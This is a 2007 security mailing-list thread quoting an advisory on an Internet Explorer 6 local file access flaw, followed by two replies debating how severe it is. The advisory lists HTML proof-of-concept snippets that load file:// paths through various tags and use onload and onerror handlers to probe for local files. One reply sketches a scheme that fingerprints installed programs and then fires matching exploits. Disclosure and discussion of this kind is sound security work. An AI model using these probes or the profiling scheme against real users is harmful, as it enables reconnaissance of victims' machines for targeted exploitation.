well, the way I'd seen it working when I stumbled across it was that you
could profile a system for known vulnerable programs, and then connect back
and exploit them. eg:
client connects to server
server serves blah.html
blah.html launches javascript to detect vulnerable programs
client connects to server telling which vulnerable programs are installed
(connection initiated by JS*)
server connects back to try known exploits against only those programs that
are installed.
yep: the practical application is limited, it does rely on other vulns, it's
not critical. I'm quite amazed MSIE's still vulnerable though (well...)
* hey, do you think if I write a paper called "intelligent exploitation in
the web2.0 age" that anyone will publish it? :D
cheers,
-h.
On 2/20/07, Jordan Wiens <[EMAIL PROTECTED]> wrote:
Umm, so? You can put links to local files in a page. Nothing new
there. If you can somehow access those objects later to disclose local
file contents, violating the same origin policy, well then by gosh
you've got a real vulnerability.
If you can tell whether they exist (ala Howard's follow-up email via
onload errors -- and similar to the intranet scanning mechanisms RSnake
and Jeremiah Grossman have been working on), great, you've got a minor
file disclosure mechanism that might be useful when combined with other
vulns, but it's still a minor vuln at best, hardly "critical".
And on the off chance that was just a clever troll, "d'oh. Got me."
--
Jordan Wiens, CISSP
UF Network Security Engineer
(352)392-2061
Rajesh Sethumadhavan wrote:
> *Microsoft Internet Explorer Local File Accesses Vulnerability*
>
> #####################################################################
>
> XDisclose Advisory : XD100099
> Vulnerability Discovered : February 10th 07
> Advisory Released : February 20th 07
> Credit : Rajesh Sethumadhavan
>
> Class : Local File Accesses
> Severity : Critical
> Solution Status : Unpatched
> Vendor : Microsoft Corporation
> Affected applications : Microsoft Internet Explorer
> Affected version : Microsoft Internet Explorer 6 confirmed
> (Other versions may be also
affected)
> Affected Platform : Windows XP Professional SP0,SP1,SP2
> Windows Home Edition SP0,SP1,SP2
> Windows 2003
>
> #####################################################################
>
>
> *Overview:*
> Microsoft Internet Explorer is a default browser bundled with all
> versions of Microsoft Windows operating system.
>
> *Description:
> *A vulnerability has been identified in Microsoft Internet Explorer,
> (default installation) in windows XP service pack 2 which could be
> exploited by malicious users to obtain victims local files. This flaw
> is due to an error in the way Microsoft Internet explorer handles
> different html tags. Which could be exploited by a malicious remote
> user to obtain sensitive local files from the victim's computer.
>
> *Vulnerability Insight :*
> Microsoft Windows explorer is not handling various html tags like "img"
> "script" "embed" "object" "param" "style" "bgsound" "body" "input"
> (Other tags may be also vulnerable). By using the file protocol along
> with above tags it is possible to accesses victims local files.
>
> */a)/* Embed Tag Local file Accesses:
> ---------------------------------------------------------------------
> <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
> ---------------------------------------------------------------------
>
> */b) /*Object & Param Tag Local File Accesses:
> ---------------------------------------------------------------------
> <object type="audio/x-mid" data=" file:///C:/test.mid" width="200"
> height="20">
> <param name="src" value="file:///C:/test.mid">
> <param name="autoStart" value="true">
> <param name="autoStart" value="0">
> </object>
> ---------------------------------------------------------------------
>
> */c)/* Body Tag Local File Accesses:
> ---------------------------------------------------------------------
> <body background="file:///C:/test.gif" onload="alert('loading body
> bgrd success')" onerror="alert('loading body bgrd error')">
> ---------------------------------------------------------------------
>
> */d)/* Style Tag Local File Accesses:
> ---------------------------------------------------------------------
> <STYLE type="text/css">BODY{background:url(" file:///C:/test.gif")}
> </STYLE>
> ---------------------------------------------------------------------
>
> */e)/* Bgsound Tag Local File Accesses:
> ---------------------------------------------------------------------
> <bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart=
> "true"/>
> ---------------------------------------------------------------------
>
> */f)/* Input Tag Local File Accesses:
> ---------------------------------------------------------------------
> <form>
> <input type="image" src=" file:///C:/test.gif" onload="alert('loading
> input success')" onerror="alert('loading input error')">
> </form>
> ---------------------------------------------------------------------
>
> */g)/* Image Tag Local File Accesses:
> ---------------------------------------------------------------------
> <img src="file:///C:/test.jpg" onload="alert('loading image success')"
> onerror="alert('loading image error')">
> ---------------------------------------------------------------------
>
> */h)/* Script Tag Local File Accesses:
> ---------------------------------------------------------------------
> <script src="file:///C:/test.js"></script <file:///C:/test.js
"></script>>
> ---------------------------------------------------------------------
>
>
> *Exploitation method:*
> - Creates a web page or an HTML Mail with the vulnerable code
> - When the victim opens the mail or visit the vulnerable site it is
> possible to accesses his local files.
>
> *Demonstration:*
> Note: Demonstration will try to accesses few default images and wave
> files
>
> - Visit the POC
> - If vulnerable internet explorer is used it will show your local
> sample images and give a proper alert.
>
> *Solution:*
> No solution
>
> *Screenshot:
> *http://www.xdisclose.com/images/xdiscloselocalie.jpg
>
> *Proof Of Concept:*
> http://www.xdisclose.com/poc/xdiscloselocalie.html
>
> *Impact:*
> A Remote user can get accesses to victims local system files.
>
> Scope of impact is limited to system level.
>
> *Original Advisory:
> *http://www.xdisclose.com/XD100099.txt
>
> *Credits:*
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability
>
> *Disclaimer:*
> This entire document is strictly for educational, testing and
> demonstrating purpose only. Modification use and/or publishing this
> information is entirely on your own risk. The exploit code is to be
> used on your testing environment only. I am not liable for any direct
> or indirect damages caused as a result of using the information or
> demonstrations provided in any part of this advisory.
>
>
>
> Thanks
> Regards
> Rajesh Sethumadhavan
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> darklab mailing list
> [email protected]
> http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
_______________________________________________
darklab mailing list
[email protected]
http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
--
This message has been ROT-13 encrypted twice for higher security...
_______________________________________________
darklab mailing list
[email protected]
http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
